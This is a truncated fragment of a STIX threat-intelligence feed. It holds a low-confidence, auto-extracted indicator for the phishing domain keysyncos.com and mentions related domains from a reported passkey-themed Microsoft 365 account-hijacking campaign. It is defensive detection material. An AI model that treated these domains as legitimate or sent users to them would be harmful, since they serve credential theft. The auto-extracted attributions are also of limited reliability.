News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1c7c976f-2edf-436d-a772-b8309144ca16","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: keysyncos.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: O Domain oktasession[.]com Identity-provider session Domain keysyncos[.]com Key synchronization Domain oskeysync[.]com Key synchroniz","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]}]}